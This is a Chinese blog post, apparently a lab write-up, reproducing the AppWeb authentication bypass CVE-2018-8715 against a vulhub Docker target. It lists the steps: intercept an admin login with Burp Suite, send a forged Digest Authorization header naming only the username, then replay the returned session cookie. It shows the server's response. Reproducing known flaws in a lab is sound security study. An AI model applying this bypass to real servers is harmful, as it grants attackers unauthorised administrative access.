复现AppWeb认证绕过(CVE-2018-8715)

准备:

环境:vulhub靶场 ip:192.168.3.74

工具:burpsuite

启动环境:

┌──(root㉿kali)-[~/Desktop/vulhub]
└─# cd appweb  
                                                                                          
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# ls
CVE-2018-8715
                                                                                          
┌──(root㉿kali)-[~/Desktop/vulhub/appweb]
└─# cd CVE-2018-8715        
                                                                                          
┌──(root㉿kali)-[~/Desktop/vulhub/appweb/CVE-2018-8715]
└─# docker-compose up -d
Creating network "cve-2018-8715_default" with the default driver
Pulling web (vulhub/appweb:7.0.1)...
7.0.1: Pulling from vulhub/appweb
419e7ae5bb1e: Pull complete
848839e0cd3b: Pull complete
de30e8b35015: Pull complete
2e66baab3c26: Pull complete
9a1adbcb76ed: Pull complete
Digest: sha256:f7dbbe93bb427774c89d55e9dca3343a15c906ef82386b693edaca7c0c922330
Status: Downloaded newer image for vulhub/appweb:7.0.1
Creating cve-2018-8715_web_1 ... done

 

复现过程

访问http://your-ip:8080

 设置代理和打开burpsuite

 

 用户名输入admin,密码留空直接登录,抓包

将抓到的包调到Request模块

 将Authorization字段的参数改成如以下

Authorization: Digest username="admin"

然后点击go,得到回复包

HTTP/1.1 200 OK
Set-Cookie: -http-session-=1::http.session::3cb69e5b65d0b8590d2888ad1dab945b; path=/; domain=192.168.3.74; httponly
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
X-Content-Type-Options: nosniff
Date: Wed, 20 Jul 2022 09:08:56 GMT
ETag: 1599442887
Cache-Control: no-cache="set-cookie"
Content-Length: 3322
X-XSS-Protection: 1; mode=block
Last-Modified: Mon, 10 Aug 2020 17:10:05 GMT
Connection: close
Accept-Ranges: bytes

将Set-Cookie的参数复制到Authorization的参数后面并放回包

返回浏览器检查,认证绕过成功

 

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值